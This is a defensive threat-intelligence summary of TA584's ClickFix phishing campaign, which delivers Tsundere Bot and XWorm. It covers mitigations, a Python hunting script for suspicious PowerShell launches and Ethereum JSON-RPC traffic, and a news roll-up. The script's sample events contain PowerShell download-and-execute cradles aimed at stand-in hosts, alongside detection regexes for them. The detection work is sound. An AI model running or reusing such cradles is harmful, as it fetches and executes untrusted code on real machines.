TA584's current attack chain begins with emails sent from compromised accounts via SendGrid and Amazon SES.
# TA584 Initial Access Campaign via Tsundere Bot and XWorm
## Key Points
- TA584, a prolific initial access broker (IAB), has shifted its tactics to deploy a combination of the **Tsundere Bot** and **XWorm** remote access trojan (RAT).
- The campaign delivers its lures through compromised accounts on legitimate email delivery services (**SendGrid** and **Amazon SES**), so the messages arrive from infrastructure with a good sending reputation and pass reputation-based filters.
- Attackers use "ClickFix" social engineering: the landing page shows a CAPTCHA-style check and then instructs the user to copy a PowerShell command and run it manually, so the victim performs the execution step that a mail gateway or browser sandbox would otherwise have to be tricked into.
- **Tsundere Bot** is sold as Malware-as-a-Service (MaaS) and retrieves its command-and-control (C2) addresses from the **Ethereum blockchain**; the operator can publish a new address with a new transaction, so taking down a domain or IP does not cut the bots off from their C2.
- Increased targeting has been observed across Australia and several European nations, signaling a geographic expansion of the threat.
## Threat Actors
- **TA584**: A known initial access broker active since at least 2020.
- **Historical Context**: Previously associated with the delivery of Ursnif, Cobalt Strike, and other payloads.
- **Motivation**: Financial (Initial Access Brokering), typically paving the way for downstream ransomware deployments.
## TTPs
- **Delivery**: Phishing emails sent from compromised accounts using Amazon SES and SendGrid.
- **Traffic Direction**: Use of unique URLs, geofencing, IP filtering, and the **Keitaro TDS** (Traffic Direction System) to filter targets.
- **Social Engineering**: "ClickFix" technique where victims are presented with a CAPTCHA followed by instructions to copy and run a malicious PowerShell command.
- **Execution**: The pasted PowerShell command retrieves XWorm or Tsundere Bot and loads it directly into memory (fileless execution), so no payload file is written to disk for signature-based scanning to catch.
- **C2 Communication**: Tsundere Bot retrieves C2 configurations via Ethereum blockchain transactions.
## Affected Systems
- **Windows Operating Systems**: The chain requires a Windows host on which the user can launch PowerShell; no software vulnerability is exploited, the user runs the command.
- **Geographic Scope**: Significant impact in the **United States**, **Australia**, and various **European countries**.
- **Industry Scope**: No sector focus is reported; the broad targeting points at corporate networks generally, consistent with an access broker selling whatever footholds it obtains.
## Mitigations
- **User Education**: Train employees to treat any web page that asks them to paste a command into the Run dialog, PowerShell, or a terminal as malicious; a legitimate CAPTCHA never requires running a command.
- **PowerShell Restrictions**: Enforce Constrained Language Mode through WDAC or AppLocker and block powershell.exe for standard users where the business allows. The PowerShell execution policy is not a security boundary and does not stop a one-liner run with `-ep bypass` or `-EncodedCommand`; enable script block logging (Event ID 4104) so that whatever does run is recorded.
- **Email Filtering**: Because the sending accounts are legitimate SendGrid and Amazon SES tenants, sender reputation will not catch these messages. Inspect the URLs instead, and alert on links from these services that pass through redirectors or a TDS such as Keitaro before landing on a CAPTCHA page.
- **Endpoint Detection**: Use EDR to alert on PowerShell launched from an unusual parent. In a ClickFix chain the command is pasted into the Run dialog, so the typical lineage is explorer.exe spawning powershell.exe with a hidden window, an encoded command, or a download cradle; a browser spawning PowerShell is rarer but equally suspicious.
- **Blockchain Monitoring**: Ethereum C2 lookups go to public JSON-RPC gateways rather than to the actor's own infrastructure. Alert on outbound JSON-RPC requests (`eth_call`, `eth_getLogs`, and similar) from endpoints that have no business reason to talk to a blockchain node, and block the gateways your organization does not use.
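The two endpoint-side checks from the list above (PowerShell launched from an unusual parent with a ClickFix-style command line, and outbound Ethereum JSON-RPC traffic) as an added example written for this summary; it is not code from the report or from any vendor tool. The process events and proxy records are constructed samples; the field names, the gateway hostnames, and the command-line feature regexes are assumptions about a typical Sysmon/proxy log shape, not indicators taken from the report.

```python
"""Hunt for the two endpoint-side signals from the Mitigations list.

Added example, not code from the report or from any vendor. The telemetry is
constructed by hand: process events use Sysmon Event ID 1 field names
(ParentImage, Image, CommandLine) and proxy records use a generic JSON shape
(src, host, method, path, body); both are assumptions about your own logs.
"""
import base64
import json
import re

# ClickFix victims paste into the Run dialog, so explorer.exe is the usual parent;
# a browser spawning PowerShell is rarer but also worth a look.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line features of a typical ClickFix one-liner. Each alone is weak (admins
# use -w hidden too), so an alert needs a suspicious parent plus two or more hits.
CMD_FEATURES = {
    "hidden_window": re.compile(r"-w(?:indow(?:style)?)?\s+hidden", re.I),
    "encoded": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or '' when there is none."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""


def score_process_event(event):
    """Return the matched feature names when the event looks like ClickFix, else []."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if parent not in SUSPICIOUS_PARENTS or image not in POWERSHELL_IMAGES:
        return []
    cmd = event.get("CommandLine", "")
    text = cmd + "\n" + decode_encoded_command(cmd)  # features may hide in the encoded part
    hits = [name for name, rx in CMD_FEATURES.items() if rx.search(text)]
    return hits if len(hits) >= 2 else []


def flag_eth_rpc(record):
    """Return the Ethereum JSON-RPC method carried by a proxy record, or None."""
    # Keyed on the request body rather than a gateway hostname list, because the
    # bot can use any public node; batch requests (a JSON array) are handled too.
    if record.get("method", "").upper() != "POST":
        return None
    try:
        payload = json.loads(record.get("body") or "")
    except ValueError:
        return None
    calls = payload if isinstance(payload, list) else [payload]
    for call in calls:
        if isinstance(call, dict) and call.get("jsonrpc") == "2.0":
            if str(call.get("method", "")).startswith("eth_"):
                return call["method"]
    return None


def hunt(process_events, proxy_records):
    """Run both detections and return the alerts keyed by signal."""
    clickfix = [(i, h) for i, ev in enumerate(process_events) if (h := score_process_event(ev))]
    eth = [(r["src"], r["host"], m) for r in proxy_records if (m := flag_eth_rpc(r))]
    return {"clickfix": clickfix, "eth_rpc": eth}


# --- constructed sample telemetry (assumed log shape, not real indicators) ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p")'.encode("utf-16-le")
).decode()
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # pasted into the Run dialog
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/c)"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,  # routine admin script
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Image": PS,
     "CommandLine": "powershell -NoP -W Hidden -Enc " + ENC},  # browser parent, encoded cradle
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # user simply opened a console
     "CommandLine": "powershell.exe"},
]
SAMPLE_PROXY_RECORDS = [
    {"src": "10.0.5.23", "host": "rpc.example-gateway.invalid", "method": "POST", "path": "/",
     "body": '{"jsonrpc":"2.0","id":1,"method":"eth_call","params":[{"to":"0x00","data":"0x"},"latest"]}'},
    {"src": "10.0.5.23", "host": "www.example.com", "method": "GET", "path": "/", "body": ""},
    {"src": "10.0.7.8", "host": "node.example-gateway.invalid", "method": "POST", "path": "/",
     "body": '[{"jsonrpc":"2.0","id":1,"method":"eth_blockNumber","params":[]}]'},
]

if __name__ == "__main__":
    for signal, items in hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_PROXY_RECORDS).items():
        for item in items:
            print(signal, item)
```

Run against the samples, the first and third process events fire (explorer.exe and chrome.exe parents with hidden window plus a download cradle) while the admin script and the bare interactive console do not; both POST bodies carrying `eth_*` methods are reported with their source address and gateway host. The two-feature threshold is the main tuning knob against administrator noise. Body inspection assumes a proxy that logs POST bodies after TLS interception; without that, fall back to alerting on the SNI or hostname of gateways your organization does not use.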
## Conclusion
TA584 represents a significant risk as a bridge for ransomware groups. Its adoption of "ClickFix" social engineering and blockchain-based C2 retrieval shows how readily the actor adapts. Organizations should harden PowerShell on endpoints, alert on PowerShell spawned from explorer.exe or a browser, and teach users that no web page should ever ask them to run a command.
***
# Morning News Roll-up January 29, 2026
## Overview
Today's intelligence focuses on the evolution of initial access brokers and their integration of evasion techniques, including blockchain-based C2 infrastructure and the abuse of legitimate cloud email services.
## Top Stories
### TA584 Shifts to Tsundere Bot and XWorm for Ransomware Access
- Summary: TA584 is leveraging compromised Amazon SES and SendGrid accounts to deliver a new attack chain. Using ClickFix social engineering and Ethereum-based C2 retrieval, the actor is deploying Tsundere Bot and XWorm to establish initial access in victim networks worldwide.
- Source: hxxps://www[.]scworld[.]com/article/ta584-threat-actor-leverages-tsundere-bot-and-xworm-for-network-access
### Tsundere Bot Employs Ethereum Blockchain for C2 Resilience
- Summary: Detailed analysis of the Tsundere Bot reveals a "Malware-as-a-Service" model that uses the Ethereum blockchain to store and update its command-and-control addresses, so that blocking or sinkholing a C2 domain does not sever the connection; the operator simply publishes a new address on-chain.
- Source: hxxps://www[.]bleepingcomputer[.]com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/
### TA584 Expands Geographic Operations to Australia and Europe
- Summary: Long-term monitoring of TA584 shows a strategic expansion beyond traditional targets, with a surge in malicious traffic directed toward Australian and European infrastructure using sophisticated TDS filtering.
- Source: hxxps://www[.]scworld[.]com/topic/threat-intelligence